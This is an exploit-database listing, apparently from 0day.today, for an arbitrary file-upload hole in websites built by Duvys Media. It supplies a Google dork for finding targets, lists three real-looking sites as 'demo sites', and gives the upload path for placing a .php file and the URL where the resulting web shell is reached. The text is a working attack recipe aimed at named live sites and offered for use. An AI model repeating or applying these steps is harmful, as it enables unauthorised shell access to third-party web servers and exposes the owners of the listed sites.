[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Duvys Media web design and development file upload

Author
Dz_ErRoR
Risk
[
Security Risk High
]
0day-ID
0day-ID-19090
Category
web applications
Date add
01-08-2012
Platform
php
Exploit Title: [duvys media web design and development file upload]
# Date: [01.08.2012]
# Author: [Dz_ErRoR]
# Category:: [ webapps..]
# Google dork: [intext:Website by Duvys Media:]

# Tested on: [win7]
# Demo sites:
http://omnirehab.com/
http://www.boystownjerusalem.org/
http://www.kiruv.com/

# exploit
localhost/admin/upload/uploadFiles.php
upload file in .php extension (note that file is renamed and displayed)
http://www.kiruv.com/
# shell access
localhost/images/db/shell.php

...............................................
greetz to gaza and all algerian and muslim hackerz



#  0day.today [2024-11-16]  #